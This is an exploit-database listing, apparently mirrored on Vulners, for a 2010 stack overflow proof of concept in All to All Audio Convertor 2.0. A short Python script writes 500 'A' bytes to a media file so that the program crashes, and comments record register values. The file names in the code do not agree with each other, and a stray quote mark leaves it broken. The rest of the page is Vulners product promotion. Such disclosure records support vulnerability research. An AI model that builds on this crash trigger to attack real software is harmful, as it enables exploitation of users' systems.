Lucene search
K

All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)

🗓️ 30 Mar 2010 00:00:00Reported by ITSecTeamType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

All to All Audio Convertor 2.0 Files Stack Overflow Po

Code
#!/usr/bin/python
#
# All to All Audio Convertor files stack overflow poc
# #############################################################################
# Credit : ItSecTeam
# mail : [email protected]
# Web:  WwW.ITSecTeam.com
# Forum: WwW.forum.itsecteam.com
# Special Tanks : PLATEN - [email protected] - B3hz4d - Cdef3nder 
# #############################################################################
# EAX 10624DD3 ECX 00000000 EDX 012200C0 EBX 100018A0 ESP 0012E59C EBP 0012EA14
# ESI 0012E5CC EDI 10001010 EIP 100018DA

try:
	file=open("poc.ogg",'w')
	Buff = "\x41" *500 # .WMA ...
	file.write( Buff )
	file.close()
	print   ("[+] File created successfully: poc.ico" )
except:
	print "[-] Error cant write file to system\n""""

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2010 00:00Current
7High risk
Vulners AI Score7
29